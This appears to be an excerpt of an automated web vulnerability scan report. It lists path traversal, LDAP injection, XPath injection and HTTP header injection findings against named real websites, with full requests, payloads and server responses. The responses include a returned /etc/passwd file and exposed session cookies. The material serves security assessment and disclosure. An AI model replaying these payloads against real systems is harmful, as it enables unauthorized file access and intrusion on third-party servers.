Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1'; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:20:05 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 51922


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta name="msvalidate.01
...[SNIP]...
</strong> Affordable web host for intermediate users, though installation problems; no domain privacy and advertising on error pages are drawbacks</div>
...[SNIP]...

Request 2

GET /link.php?kw=gid9a%20identity%20theft%20resource_ordering34&category=identitytheft&link=idtheftshield&id=227 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1''; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:20:08 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 41061


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta name="msvalidate.01
...[SNIP]...

2. File path traversal  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nextadvisor.com
Path:   /includes/javascript.php

Issue detail

The script parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload ../../../../../../../../../../proc/cpuinfo../../../../../../../../etc/passwd was submitted in the script parameter. The requested file was returned in the application's response.

Request

GET /includes/javascript.php?script=../../../../../../../../../../proc/cpuinfo../../../../../../../../etc/passwd HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:06:28 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Vary: Accept-Encoding
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 1830

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdow
...[SNIP]...
ucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL
...[SNIP]...

3. LDAP injection  previous  next
There are 2 instances of this issue:


3.1. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The pid parameter appears to be vulnerable to LDAP injection attacks.

The payloads 6b8420a4611b3464)(sn=* and 6b8420a4611b3464)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /bmx3/broker.pli?pid=6b8420a4611b3464)(sn=*&PRAd=253735207&AR_C=186884836 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; UID=875e3f1e-184.84.247.65-1303349046

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:09:53 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_6b8420a4611b3464&#41;&#40;sn=exp=1&initExp=Sun Apr 24 12:09:53 2011&recExp=Sun Apr 24 12:09:53 2011&prad=253735207&arc=186884836&; expires=Sat 23-Jul-2011 12:09:53 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303646993; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

Request 2

GET /bmx3/broker.pli?pid=6b8420a4611b3464)!(sn=*&PRAd=253735207&AR_C=186884836 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; UID=875e3f1e-184.84.247.65-1303349046

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:09:53 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_6b8420a4611b3464&#41;!&#40;sn=exp=1&initExp=Sun Apr 24 12:09:53 2011&recExp=Sun Apr 24 12:09:53 2011&prad=253735207&arc=186884836&; expires=Sat 23-Jul-2011 12:09:53 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303646993; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

3.2. http://sftrack.searchforce.net/SFConversionTracking/redir [jaid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sftrack.searchforce.net
Path:   /SFConversionTracking/redir

Issue detail

The jaid parameter appears to be vulnerable to LDAP injection attacks.

The payloads 6c1341d6deadf489)(sn=* and 6c1341d6deadf489)!(sn=* were each submitted in the jaid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /SFConversionTracking/redir?jadid=6589725365&jk=credit%20monitoring%20service&js=1&jmt=1_b_&jp=&jkId=8a8ae4e72e3a0b58012e4f128cd461ee&jaid=6c1341d6deadf489)(sn=*&jt=3&jsid=21865&jr=http%3A%2F%2Flanding.americanexpress.com%2Fv2.php%3Ftype%3Dv2&&gclid=CNqttZH1tagCFQbe4AodEirYCA HTTP/1.1
Host: sftrack.searchforce.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: sf_conv_info_6c1341d6deadf489)(sn=*=cid%3D8109d753-f0ef-4ba1-8b4f-e498b0828fc0%26csesid%3D21865%26caid%3D6c1341d6deadf489%29%28sn%3D*%26csk%3Dcredit+monitoring+service%26cmt%3D1_b_%26clandtime%3D04%2F24%2F2011+12%3A58%3A51+PDT%26ctest%3Dfalse%26cadoid%3D1%26ckfk%3D8a8ae4e72e3a0b58012e4f128cd461ee%26cagfk%3D%26cadid%3D6589725365%26ckid%3D-1%26cp%3D%26; Expires=Tue, 24-May-2011 19:58:51 GMT
P3P: policyref="http://sftrack.searchforce.net/SFConversionTracking/w3c/p3p.xml", CP="NOI CURa ADMa DEVa TAIa IVAa IVDa OUR BUS IND UNI COM NAV INT"
Referer:
Location: http://landing.americanexpress.com/v2.php?type=v2&gclid=CNqttZH1tagCFQbe4AodEirYCA&
Content-Length: 0
Date: Sun, 24 Apr 2011 19:58:50 GMT

Request 2

GET /SFConversionTracking/redir?jadid=6589725365&jk=credit%20monitoring%20service&js=1&jmt=1_b_&jp=&jkId=8a8ae4e72e3a0b58012e4f128cd461ee&jaid=6c1341d6deadf489)!(sn=*&jt=3&jsid=21865&jr=http%3A%2F%2Flanding.americanexpress.com%2Fv2.php%3Ftype%3Dv2&&gclid=CNqttZH1tagCFQbe4AodEirYCA HTTP/1.1
Host: sftrack.searchforce.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: sf_conv_info_6c1341d6deadf489)!(sn=*=cid%3Dcfd53b94-72d7-4399-b20a-f3511dba2577%26csesid%3D21865%26caid%3D6c1341d6deadf489%29%21%28sn%3D*%26csk%3Dcredit+monitoring+service%26cmt%3D1_b_%26clandtime%3D04%2F24%2F2011+12%3A58%3A52+PDT%26ctest%3Dfalse%26cadoid%3D1%26ckfk%3D8a8ae4e72e3a0b58012e4f128cd461ee%26cagfk%3D%26cadid%3D6589725365%26ckid%3D-1%26cp%3D%26; Expires=Tue, 24-May-2011 19:58:52 GMT
P3P: policyref="http://sftrack.searchforce.net/SFConversionTracking/w3c/p3p.xml", CP="NOI CURa ADMa DEVa TAIa IVAa IVDa OUR BUS IND UNI COM NAV INT"
Referer:
Location: http://landing.americanexpress.com/v2.php?type=v2&gclid=CNqttZH1tagCFQbe4AodEirYCA&
Content-Length: 0
Date: Sun, 24 Apr 2011 19:58:52 GMT


4. XPath injection  previous  next
There are 3 instances of this issue:


4.1. http://www.truecredit.com/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.truecredit.com
Path:   /

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ',0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET / HTTP/1.1
Host: www.truecredit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',0,0)waitfor%20delay'0%3a0%3a20'--
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TCID=1303674394504:2le; s_pers=%20s_nr%3D1303674501185%7C1306266501185%3B%20s_vnum%3D1306266408564%2526vn%253D2%7C1306266408564%3B%20s_visit%3D1%7C1303680178921%3B%20s_depth%3D1%7C1303680178926%3B%20dfa_cookie%3Dtuitruecredit%7C1303680178936%3B%20s_ev22%3D%255B%255B'%25257C%25257C%25257C%25257CTriBureauCMUStartupfee%25257Ccredit%25257C20110324-174a3c150b7e7f3b565b%25257C%25257C%25257C%25257C'%252C'1303674496801'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303674498602'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303674501180'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303678375845'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303678378941'%255D%255D%7C1461531178941%3B%20s_invisit%3Dtrue%7C1303680178950%3B%20s_lv%3D1303678378956%7C1398286378956%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1303680178956%3B%20s_pv%3Dtc%253ALogin%2520%253A%2520Return%2520User%2520Login%7C1303680178964%3B

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 25 Apr 2011 00:46:19 GMT
Server: Apache
Set-Cookie: JSESSIONID=fXDGr6EQpVSg; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 8042


<html>
<head>
<style>
.text { font-family: "arial","helvetica", sans-serif; font-size:10pt; color:#000000; }
.title { font-family: "arial","helvetica", sans-serif; font-size:18p
...[SNIP]...
lib/jdbc2_0-stdext.jar:webroot/WEB-INF/lib/jaas.jar:webroot/WEB-INF/lib/xbean.jar:webroot/WEB-INF/lib/jms.jar:webroot/WEB-INF/lib/ant-tests-1.4.1.jar:webroot/WEB-INF/lib/jnet.jar:webroot/WEB-INF/lib/saxpath.jar:webroot/WEB-INF/lib/commons-beanutils-1.7.0.jar:webroot/WEB-INF/lib/jsr173_1.0_api.jar:webroot/WEB-INF/lib/js.jar:webroot/WEB-INF/lib/oswego-concurrent.jar:webroot/WEB-INF/lib/poi-2.5.1-final-2004
...[SNIP]...

4.2. https://www.trustedid.com/js/mootools.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.trustedid.com
Path:   /js/mootools.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /js/mootools.js'?ad1211d939 HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
Referer: https://www.trustedid.com/cmalp1.php?promoRefCode=SEMGOOGCM14DF&gclid=CLTp5ZX1tagCFUSo4Aod61iHCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TIDT=173.193.214.243.1303675622062056; TSI=h2ps2qs3veg2jts7b9arqg2g55; promoRefCode=SEMGOOGCM14DF

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:27:10 GMT
Server: Apache
Last-Modified: Fri, 17 Jul 2009 18:23:54 GMT
ETag: "238263-169aa-e4086280"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sun, 24 Apr 2011 20:32:10 GMT
Connection: Keep-Alive
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 92586

//MooTools, <http://mootools.net>, My Object Oriented (JavaScript) Tools. Copyright (c) 2006-2008 Valerio Proietti, <http://mad4milk.net>, MIT Style License.

var MooTools={version:"1.2.0",build:""};v
...[SNIP]...
ction"||A=="array")?Array:Hash).each(C,B,D);}var Browser=new Hash({Engine:{name:"unknown",version:""},Platform:{name:(navigator.platform.match(/mac|win|linux/i)||["other"])[0].toLowerCase()},Features:{xpath:!!(document.evaluate),air:!!(window.runtime)},Plugins:{}});
if(window.opera){Browser.Engine={name:"presto",version:(document.getElementsByClassName)?950:925};}else{if(window.ActiveXObject){Browser.Eng
...[SNIP]...

4.3. https://www.trustedid.com/js/prototype.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.trustedid.com
Path:   /js/prototype.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /js/prototype.js'?45cfd1b2f5 HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
Referer: https://www.trustedid.com/idfide01/?promoCodeRefIde=NXTIDF01IDEFT&promoCodeRefIdf=NXTIDF01IDFFT15
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TIDT=173.193.214.243.1303614754152763; TSI=6rjj85kupb6n5r77pnlgtoq3g0; promoRefCode=NXDIRSUZIDPANN

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:16:02 GMT
Server: Apache
Last-Modified: Fri, 17 Jul 2009 18:23:54 GMT
ETag: "1103eb-1e468-e4086280"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sun, 24 Apr 2011 03:21:02 GMT
Connection: Keep-Alive
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 124008

/* Prototype JavaScript framework, version 1.6.0.1
* (c) 2005-2007 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prototyp
...[SNIP]...
Gecko: navigator.userAgent.indexOf('Gecko') > -1 && navigator.userAgent.indexOf('KHTML') == -1,
MobileSafari: !!navigator.userAgent.match(/Apple.*Mobile.*Safari/)
},

BrowserFeatures: {
XPath: !!document.evaluate,
ElementExtensions: !!window.HTMLElement,
SpecificElementExtensions:
document.createElement('div').__proto__ &&
document.createElement('div').__proto__ !==

...[SNIP]...

5. HTTP header injection  previous  next
There are 6 instances of this issue:


5.1. http://ad-emea.doubleclick.net/adi/N5295.150290.INVITEMEDIA.COM/B5186974.5 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5295.150290.INVITEMEDIA.COM/B5186974.5

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1ec09%0d%0a11f01021a7f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1ec09%0d%0a11f01021a7f/N5295.150290.INVITEMEDIA.COM/B5186974.5;sz=160x600;u=xbAGfINSKt5nVliGWhRj1MkmJLkabfPvqs_JGh9sR1hXYoWegOCq95Gmt37Sv9G4e-8FS4YZq9MZuUQN6XXQcURsfNWtBOq4xvbw;ord=[timestamp]? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676476&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658476068&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658476073&frm=1&adk=2614322350&ga_vid=946321799.1303658476&ga_sid=1303658476&ga_hid=1959143377&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1ec09
11f01021a7f
/N5295.150290.INVITEMEDIA.COM/B5186974.5;sz=160x600;u=xbAGfINSKt5nVliGWhRj1MkmJLkabfPvqs_JGh9sR1hXYoWegOCq95Gmt37Sv9G4e-8FS4YZq9MZuUQN6XXQcURsfNWtBOq4xvbw;ord=[timestamp]:
Date: Sun, 24 Apr 2011 15:28:24 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

5.2. http://ad.doubleclick.net/getcamphist [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /getcamphist

Issue detail

The value of the src request parameter is copied into the Location response header. The payload 21046%0d%0a204b0002e8c was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /getcamphist;src=1516833;host=equifaxps.122.2o7.net%2Fb%2Fss%2Fequifaxprod%2Cequifaxglobal%2F1%2FH.17%2Fs0893607710022%3FAQB%3D1%26vvpr%3Dtrue%26%26pccr%3Dtrue%26vidn%3D26DA3ED4051D0814-60000137E022F418%26%26ndh%3D1%26t%3D24%2F3%2F2011%252014%253A44%253A52%25200%2520300%26ns%3Dequifaxps%26pageName%3D%2Fus%2Fpsol%2Fweb%2Flander%2FECLanderM-Q1NEWFREETRIAL%26g%3Dhttp%253A%2F%2Fequifax.com%2Ffree30daytrial%2F%253FCMP%253DKNC-Google%2526HBX_PK%253Dcredit_monitoring_service%2526HBX_OU%253D50%2526gclid%253DCNf214_1tagCFeM85Qod4FaqEA%26cc%3DUSD%26vvp%3DDFA%25231516833%253Av18%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3DPersonal%2520Solutions%26server%3DSamba%26events%3Devent8%26c7%3D12%253A30PM%26v7%3D12%253A30PM%26c8%3DSunday%26v8%3DSunday%26c10%3DNew%26v10%3DNew%26c14%3D%2Fus%2Fpsol%2Fweb%2Flander%2FECLanderM-Q1NEWFREETRIAL%26v14%3D%2Fus%2Fpsol%2Fweb%2Flander%2FECLanderM-Q1NEWFREETRIAL%26v16%3D%2Fus%2Fpsol%2Fweb%2Flander%2FECLanderM-Q1NEWFREETRIAL%26s%3D1920x1200%26c%3D16%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1034%26bh%3D907%26p%3DShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.240.7%253BJava%2528TM%2529%2520Platform%2520SE%25206%2520U24%253BSilverlight%2520Plug-In%253BChrome%2520PDF%2520Viewer%253BGoogle%2520Gears%25200.5.33.0%253BWPI%2520Detector%25201.3%253BGoogle%2520Update%253BDefault%2520Plug-in%253B%26AQE%3D121046%0d%0a204b0002e8c&A2S=1;ord=1822386431 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://equifax.com/free30daytrial/?CMP=KNC-Google&HBX_PK=credit_monitoring_service&HBX_OU=50&gclid=CNf214_1tagCFeM85Qod4FaqEA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://equifaxps.122.2o7.net/b/ss/equifaxprod,equifaxglobal/1/H.17/s0893607710022?AQB=1&vvpr=true&&pccr=true&vidn=26DA3ED4051D0814-60000137E022F418&&ndh=1&t=24/3/2011%2014%3A44%3A52%200%20300&ns=equifaxps&pageName=/us/psol/web/lander/ECLanderM-Q1NEWFREETRIAL&g=http%3A//equifax.com/free30daytrial/%3FCMP%3DKNC-Google%26HBX_PK%3Dcredit_monitoring_service%26HBX_OU%3D50%26gclid%3DCNf214_1tagCFeM85Qod4FaqEA&cc=USD&vvp=DFA%231516833%3Av18%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=Personal%20Solutions&server=Samba&events=event8&c7=12%3A30PM&v7=12%3A30PM&c8=Sunday&v8=Sunday&c10=New&v10=New&c14=/us/psol/web/lander/ECLanderM-Q1NEWFREETRIAL&v14=/us/psol/web/lander/ECLanderM-Q1NEWFREETRIAL&v16=/us/psol/web/lander/ECLanderM-Q1NEWFREETRIAL&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1034&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=121046
204b0002e8c
